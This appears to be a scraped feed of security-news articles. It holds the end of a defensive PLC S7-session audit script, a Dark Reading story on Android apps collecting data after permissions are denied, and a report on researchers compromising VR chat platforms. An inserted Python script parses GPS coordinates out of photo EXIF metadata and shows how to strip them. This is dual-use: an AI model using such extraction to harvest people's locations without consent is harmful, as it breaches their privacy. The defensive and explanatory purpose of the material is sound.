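    return any(addr in net for net in INTERNAL_NETS)


def audit_s7_sessions(text):
    """Return one Finding per S7 (TCP/102) session to a PLC that violates the policy.

    Checks, in order of severity: source outside the plant network, source that is not an
    approved engineering station, approved station talking outside the change window.
    Every finding also records whether the client-to-PLC volume looked like a program download.
    """
    findings = []
    lo, hi = CHANGE_WINDOW_UTC
    for r in parse_conn_log(text):
        if r["dst"] not in PLCS or r["dport"] != S7_PORT or r["proto"] != "tcp":
            continue
        hour = datetime.fromtimestamp(r["ts"], tz=timezone.utc).hour
        if not _is_internal(r["src"]):
            reason = "external_source"
        elif r["src"] not in ENGINEERING_STATIONS:
            reason = "unauthorized_station"
        elif not lo <= hour < hi:
            reason = "outside_change_window"
        else:
            continue                                # approved station, approved hours: normal
        findings.append(Finding(r["ts"], r["src"], r["dst"], reason,
                                r["orig_bytes"] >= LARGE_TRANSFER_BYTES))
    return findings


if __name__ == "__main__":
    for f in audit_s7_sessions(SAMPLE_CONN_LOG):
        print(f)
```

The allowlist approach is deliberately protocol-agnostic: because the rogue station speaks valid S7 traffic, a deep-packet rule that only recognises malformed messages would not see anything wrong, whereas "who is talking to the PLC, from where, and when" is observable from flow data alone.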

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise …

Article source: https://www.darkreading.com/vulnerabilities---threats/researchers-poke-holes-in-siemens-simatic-s7-plcs-/d/d-id/1335168?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Android App Publishers Won’t Take ‘No’ for an Answer on Personal Data

Researchers find more than 1,000 apps in the Google Play store that gather personal data even when the user has denied permission.

App publishers like consumer data so much that they’re willing to go to great lengths to get it — even when those lengths involve ignoring or working around the consumer denying them the right to that data.

At the Federal Trade Commission’s PrivacyCon 2019, held in June, researchers from the International Computer Science Institute (ICSI) presented data showing that as many as 1,325 Android apps were gathering data from devices, even after the device owners had denied such permission to the apps.

The data presented at the conference is based on the team’s earlier paper for the USENIX Security Symposium, “50 Ways to Leak Your Data,” in which researchers from UC Berkeley, AppCensus, and Universidad Carlos III de Madrid examined more than 88,000 Android apps to see how they captured, used, and stored customer data. They found that Android apps employ a number of techniques for gathering data that the user may believe is private.

As an example, the researchers pointed to photography apps that read the GPS coordinates embedded in photos’ EXIF metadata to obtain location information after the user has denied the app the location permission; reading a photo requires only storage access, not location access. Other apps inferred location by collecting the MAC address of the Wi-Fi router the device was connected to, which can be looked up in public geolocation databases, rather than directly requesting the device’s location.
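How the photo side channel works, as an added example that is not part of the original article or of the researchers’ tooling: a JPEG’s EXIF segment is a TIFF structure whose first directory (IFD0) can point to a GPS sub-IFD holding the camera’s coordinates as degree/minute/second rationals, readable with ordinary file access and no location permission at all. The script below builds a minimal EXIF blob with a GPS IFD (constructed sample; a real file wraps this in an APP1 marker after an “Exif\0\0” prefix), parses it back to decimal degrees the way a scraping SDK would, and shows the mitigation of stripping the GPS pointer before a photo is shared. The coordinates are constructed; tag numbers and types follow the EXIF specification.

```python
import struct

# EXIF/TIFF constants (EXIF 2.x specification)
TAG_GPS_IFD = 0x8825                      # IFD0 entry pointing at the GPS sub-IFD
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 0x0001, 0x0002, 0x0003, 0x0004
TYPE_ASCII, TYPE_LONG, TYPE_RATIONAL = 2, 4, 5
ENTRY_SIZE = 12                           # tag(2) + type(2) + count(4) + value/offset(4)


def _deg_to_dms_rationals(deg):
    """Decimal degrees -> three (numerator, denominator) pairs, as cameras write them."""
    deg = abs(deg)
    d = int(deg)
    minutes = (deg - d) * 60
    m = int(minutes)
    s = (minutes - m) * 60
    return [(d, 1), (m, 1), (int(round(s * 10000)), 10000)]


def build_exif_with_gps(lat, lon):
    """Constructed sample: little-endian TIFF/EXIF blob whose IFD0 holds only a GPS IFD pointer."""
    ifd0_off = 8                                   # TIFF header is 8 bytes
    gps_off = ifd0_off + 2 + ENTRY_SIZE + 4        # IFD0: count + 1 entry + next-IFD pointer
    data_off = gps_off + 2 + 4 * ENTRY_SIZE + 4    # GPS IFD: count + 4 entries + next-IFD pointer

    def entry(tag, typ, count, value):             # values of <= 4 bytes are stored inline
        return struct.pack("<HHI", tag, typ, count) + value.ljust(4, b"\0")

    def rationals(pairs):
        return b"".join(struct.pack("<II", n, d) for n, d in pairs)

    header = b"II" + struct.pack("<HI", 42, ifd0_off)
    ifd0 = (struct.pack("<H", 1)
            + entry(TAG_GPS_IFD, TYPE_LONG, 1, struct.pack("<I", gps_off))
            + struct.pack("<I", 0))
    gps_ifd = (struct.pack("<H", 4)
               + entry(GPS_LAT_REF, TYPE_ASCII, 2, (b"N" if lat >= 0 else b"S") + b"\0")
               + entry(GPS_LAT, TYPE_RATIONAL, 3, struct.pack("<I", data_off))
               + entry(GPS_LON_REF, TYPE_ASCII, 2, (b"E" if lon >= 0 else b"W") + b"\0")
               + entry(GPS_LON, TYPE_RATIONAL, 3, struct.pack("<I", data_off + 24))
               + struct.pack("<I", 0))
    return (header + ifd0 + gps_ifd
            + rationals(_deg_to_dms_rationals(lat)) + rationals(_deg_to_dms_rationals(lon)))


def _read_ifd(blob, off, e):
    """Return {tag: (type, count, raw 4 value/offset bytes)} for the IFD at `off`."""
    (n,) = struct.unpack_from(e + "H", blob, off)
    entries = {}
    for i in range(n):
        pos = off + 2 + ENTRY_SIZE * i
        tag, typ, count = struct.unpack_from(e + "HHI", blob, pos)
        entries[tag] = (typ, count, blob[pos + 8:pos + 12])
    return entries


def _dms_to_deg(blob, e, raw_offset):
    """Follow a RATIONAL[3] offset and convert degrees/minutes/seconds to decimal degrees."""
    (off,) = struct.unpack(e + "I", raw_offset)
    parts = []
    for i in range(3):
        num, den = struct.unpack_from(e + "II", blob, off + 8 * i)
        parts.append(num / den if den else 0.0)
    d, m, s = parts
    return d + m / 60 + s / 3600


def extract_gps(blob):
    """What a scraping SDK does: return (lat, lon) in decimal degrees, or None if no GPS tags."""
    e = "<" if blob[:2] == b"II" else ">"          # byte-order mark: "II" Intel, "MM" Motorola
    magic, ifd0_off = struct.unpack_from(e + "HI", blob, 2)
    if magic != 42:
        raise ValueError("not a TIFF/EXIF header")
    ifd0 = _read_ifd(blob, ifd0_off, e)
    if TAG_GPS_IFD not in ifd0:
        return None
    (gps_off,) = struct.unpack(e + "I", ifd0[TAG_GPS_IFD][2])
    gps = _read_ifd(blob, gps_off, e)
    if not all(t in gps for t in (GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON)):
        return None
    lat = _dms_to_deg(blob, e, gps[GPS_LAT][2])
    lon = _dms_to_deg(blob, e, gps[GPS_LON][2])
    if gps[GPS_LAT_REF][2][:1] == b"S":
        lat = -lat
    if gps[GPS_LON_REF][2][:1] == b"W":
        lon = -lon
    return round(lat, 4), round(lon, 4)


def strip_gps(blob):
    """Mitigation: drop the GPS IFD pointer from IFD0 so no parser can reach the coordinates.
    IFD0 is rewritten in place and the freed entry slot zero-filled; the orphaned GPS bytes
    stay behind in this constructed blob (a real scrubber rewrites the whole file)."""
    e = "<" if blob[:2] == b"II" else ">"
    (ifd0_off,) = struct.unpack_from(e + "I", blob, 4)
    (n,) = struct.unpack_from(e + "H", blob, ifd0_off)
    entries = [blob[ifd0_off + 2 + ENTRY_SIZE * i: ifd0_off + 2 + ENTRY_SIZE * (i + 1)]
               for i in range(n)]
    kept = [x for x in entries if struct.unpack(e + "H", x[:2])[0] != TAG_GPS_IFD]
    next_ptr = blob[ifd0_off + 2 + ENTRY_SIZE * n: ifd0_off + 6 + ENTRY_SIZE * n]
    new_ifd0 = (struct.pack(e + "H", len(kept)) + b"".join(kept) + next_ptr).ljust(6 + ENTRY_SIZE * n, b"\0")
    out = bytearray(blob)
    out[ifd0_off:ifd0_off + len(new_ifd0)] = new_ifd0
    return bytes(out)


if __name__ == "__main__":
    photo = build_exif_with_gps(37.8716, -122.2727)    # constructed coordinates
    print("leaked:", extract_gps(photo))
    print("after strip:", extract_gps(strip_gps(photo)))
```

The point for defenders is that the permission model guards the location API, not the bytes already sitting in storage: any app with read access to the photo library gets the same answer `extract_gps` does, so the fix has to be to scrub metadata at the source or at the sharing boundary rather than to rely on the denied permission.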

“Apps capturing and using data in unintended ways is not new and has been a problem since the first smartphone app was introduced,” says Chris Morales, head of security analytics at Vectra. “The smartphone market moved so quickly, the goal of the OS manufacturer was to ensure they had a large enough volume of apps to be relevant in the market. Security was not a primary driver and we find the OS manufacturers now having to clean up the after effects of fast growth in the app store.”

According to Google, that cleanup will extend into the next major Android release. While researchers notified the company of the privacy issue in September, Google has said that it won’t address the “side-channel” information gathering until the release of Android Q, scheduled for October 2019.

Until Android Q is available, Android phone users will simply have to be careful about the apps they install, even when those apps are downloaded from Google Play. Terence Jackson, CISO at Thycotic, says: “Data privacy is all the rage now, GDPR, CCPA, LGPD, just to name a few. But this story highlights the importance of app store owners to implement a more Zero Trust model toward their developers and implement ongoing strategies to evaluate application security.”

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and …

Article source: https://www.darkreading.com/endpoint/android-app-publishers-wont-take-no-for-an-answer-on-personal-data/d/d-id/1335169?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Researchers hack VR worlds

Researchers have shown how to infiltrate virtual reality (VR) platforms and manipulate users’ immersive 3D worlds.

At the REcon security conference in Montreal, researchers Alex Radocea and Philip Pettersson demonstrated how to hack virtual reality worlds on three platforms.

  • The first was VRChat, a virtual chat room available via the Steam gaming platform and Facebook-owned Oculus.
  • The second was Steam’s own SteamVR platform, which provides games designed for VR and also lets users play traditional games on a giant virtual screen.
  • Finally, High Fidelity, an open source VR system with its own blockchain-based digital currency, got the hacking treatment.

Hacking an immersive VR world enables an attacker to take complete control of the victim’s virtual world, Radocea and Pettersson warned. An attacker can listen to what the victim is saying, and can also create fake images.

What kinds of real-world attacks could someone engineer in a VR world? In the demonstration, the researchers opened the Windows Calc.exe program, the customary way of proving that you can run arbitrary code on a system. In most demonstrations the calculator simply appears on the desktop, but here it replaced one of the VR user’s hands, like a giant sticky note they couldn’t get rid of.

Attackers could irritate VR users or push inappropriate images to chatroom users, and they could eavesdrop on conversations. The real danger, though, is more traditional: using a VR chatroom to execute code remotely on a target machine is serious enough on its own.

According to one show attendee, the researchers also opened a Meterpreter shell. Meterpreter is the in-memory payload of the Metasploit exploitation framework that penetration testers use to exploit flaws in client systems; it gives the operator an interactive command shell for remotely controlling a compromised target.

On the VRChat and SteamVR platforms, the researchers found a way to take control of victims’ systems simply by inviting them into a chat room. Any user entering the room would encounter the exploit, which would then compromise their machine. Because joining a chatroom is so easy, many computers could be compromised in short order: a program could automatically invite all of a compromised user’s contacts into the chatroom, producing a worm that would spread quickly, they warned.

This isn’t the first time VR systems have been hacked. In February 2019, researchers at the University of New Haven discovered vulnerabilities in Bigscreen, a VR environment that lets people gather in virtual rooms to collaborate on massive virtual screens or watch movies together. That hack let the researchers gatecrash private rooms while remaining invisible, in what they called a “man in the room” attack. They could turn on users’ microphones and listen to private conversations, and – just as Radocea and Pettersson demonstrated – create self-replicating worms that infect users as soon as they enter a room. The attack could also download and run programs, including malware, on users’ computers.

Radocea and Pettersson disclosed the most recent bugs responsibly and all of the vulnerable platforms put a fix in place.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/miOW6FanYj4/